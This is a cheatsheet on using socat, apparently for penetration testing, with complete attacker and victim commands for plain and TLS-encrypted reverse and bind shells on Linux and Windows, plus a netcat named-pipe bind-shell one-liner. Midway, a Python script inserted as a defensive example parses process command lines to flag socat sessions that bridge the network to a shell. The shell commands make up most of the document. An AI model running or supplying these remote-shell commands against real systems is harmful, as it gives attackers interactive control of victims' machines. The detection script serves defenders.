Socat Cheatsheet - Better netcat
Tool used to establish a more stable shell compared to netcat. Features:
- Use of the arrow keys
- Allows interactive commands such as sudo
- Use of CTRL + S, CTRL + C
Reverse Shell for Linux
Attacker:
socat TCP-L:<port> FILE:`tty`,raw,echo=0
Victim:
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Additional step:
Open a new command prompt on your own machine, type stty -a, and record the values of rows and columns.
Next, in your reverse/bind shell, type:
stty rows <number>
note: <number> is the value you recorded.
and
stty cols <number>
Filling in the numbers you got from running the command in your own terminal.
This will change the registered width and height of the terminal, allowing programs such as text editors, which rely on this information being accurate, to open correctly.
Reverse Shell for Windows
Attacker:
socat tcp-l:<port> -
Victim:
If you want to spawn a PowerShell:
socat tcp:<attacker_ip>:<attacker_port> EXEC:powershell,pipes
If you want to spawn a command line:
socat tcp:<attacker_ip>:<attacker_port> EXEC:cmd.exe,pipes
Then refer to the additional step.
Encrypted Shell
- Generate a certificate:
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
- Merge key and cert together:
cat shell.key shell.crt > encrypt.pem
- Decide whether to use a reverse shell or a bind shell (with a bind shell the target listens and the attacker connects to it).
Encrypted Reverse Shell for Linux
- Set up a Listener on the Attacker
socat OPENSSL-LISTEN:<port>,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
- Target machine connects back to the Attacker
socat OPENSSL:<attacker_ip>:<attacker_port>,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
- Refer to the additional step
Encrypted Reverse Shell for Windows
- Set up a Listener on the Attacker Machine
socat OPENSSL-LISTEN:<port>,cert=encrypt.pem,verify=0 -
- Target machine connects back to the Attacker
socat OPENSSL:<attacker_ip>:<attacker_port>,verify=0 -
- Refer to the additional step
Encrypted Bind Shell for Linux
Note: A bind shell requires moving the .pem file (the merged key and cert from above; the commands below call it shell.pem) to the target.
- Set up a Listener on the Victim
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:/bin/bash
- Attacker connects to the open port on the victim machine
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -
- Refer to the additional step
Encrypted Bind Shell for Windows
Note: A bind shell requires moving the .pem file (the merged key and cert from above; the commands below call it shell.pem) to the target.
- Set up a Listener on the Victim
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:powershell,pipes
If you want the command line:
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes
- Attacker connects to the open port on the victim machine
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -
- Refer to the additional step
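From the defender's side, every invocation in the sections above has the same shape: one socat process bridging a network address (TCP or OPENSSL, listening or connecting) to an EXEC address, usually with verify=0 and often with a pty. The Python below is an added example, not part of the original cheatsheet, that parses process command lines of that shape (as you would pull them from ps output or auditd execve records) and reports the direction, whether TLS is used, whether peer verification was disabled, and whether a pty was requested. The command lines it scans are constructed samples; the IP addresses and ports in them are invented.

```python
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple

# socat address types that carry traffic over the network.
NETWORK_TYPES = {
    "TCP", "TCP4", "TCP6", "TCP-L", "TCP-LISTEN", "TCP4-L", "TCP4-LISTEN",
    "TCP6-L", "TCP6-LISTEN", "UDP", "UDP-L", "UDP-LISTEN",
    "OPENSSL", "OPENSSL-LISTEN", "SSL", "SSL-L", "SSL-LISTEN",
}
# socat address types that run a program on the local host.
EXEC_TYPES = {"EXEC", "SYSTEM"}

# Constructed sample command lines (not real telemetry). 10.0.0.5 is an invented IP.
SAMPLE_CMDLINES = [
    'socat TCP-L:4444 FILE:`tty`,raw,echo=0',                                     # handler side, no EXEC
    'socat TCP:10.0.0.5:4444 EXEC:"bash -li",pty,stderr,sigint,setsid,sane',     # plain reverse shell
    'socat OPENSSL-LISTEN:443,cert=shell.pem,verify=0 EXEC:/bin/bash',           # TLS bind shell
    'socat OPENSSL:10.0.0.5:443,verify=0 EXEC:powershell,pipes',                 # TLS reverse shell
    'socat TCP-LISTEN:8080,fork TCP:127.0.0.1:80',                               # benign port forward
    'socat - UNIX-CONNECT:/var/run/docker.sock',                                  # benign admin use
    'sshd: user@pts/0',                                                           # not socat at all
]


@dataclass
class Finding:
    cmdline: str
    direction: str        # "reverse" (host connects out) or "bind" (host listens)
    encrypted: bool       # OPENSSL/SSL address type
    verify_disabled: bool # verify=0 on the network address
    command: str          # what the EXEC/SYSTEM address runs
    pty: bool             # pty option present on the EXEC address


def parse_address(addr: str) -> Tuple[str, str, List[str]]:
    """Split a socat address 'TYPE:params,opt1,opt2=v' into (TYPE, params, [options])."""
    if addr == "-":
        return ("STDIO", "", [])
    if ":" not in addr:
        return (addr.upper(), "", [])
    atype, rest = addr.split(":", 1)
    parts = rest.split(",")
    return (atype.upper(), parts[0], parts[1:])


def analyze_socat(cmdline: str) -> Optional[Finding]:
    """Return a Finding if the command line bridges a network address to a local program."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] != "socat":
        return None
    # Drop socat's own options (-d, -v, ...) but keep "-" which means stdio.
    addrs = [parse_address(a) for a in argv[1:] if a == "-" or not a.startswith("-")]
    if len(addrs) != 2:
        return None
    net = [a for a in addrs if a[0] in NETWORK_TYPES]
    ex = [a for a in addrs if a[0] in EXEC_TYPES]
    if not net or not ex:
        return None
    ntype, _, nopts = net[0]
    _, command, eopts = ex[0]
    listening = "LISTEN" in ntype or ntype.endswith("-L")
    return Finding(
        cmdline=cmdline,
        direction="bind" if listening else "reverse",
        encrypted=ntype.startswith(("OPENSSL", "SSL")),
        verify_disabled="verify=0" in nopts,
        command=command,
        pty="pty" in eopts,
    )


def scan(cmdlines: List[str]) -> List[Finding]:
    """Run analyze_socat over a batch of command lines and keep the hits."""
    return [f for f in (analyze_socat(c) for c in cmdlines) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"{f.direction:8} tls={f.encrypted!s:5} verify=0:{f.verify_disabled!s:5} "
              f"pty={f.pty!s:5} cmd={f.command!r}")
```

The rule keys on the pairing of a network address with EXEC or SYSTEM, so the attacker-side handler (FILE:`tty`) and plain port forwards are not reported. It only sees what the command line shows: a renamed socat binary, or a shell started from a wrapper script, will not match, so pair this with network-side telemetry on unexpected outbound TLS connections with unverified peers.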
One tool I found helpful for creating reverse shells and bind shells: https://www.revshells.com/
However, I found the nc Bind to be wrong...
This is what it should be:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -lvnp [port] > /tmp/f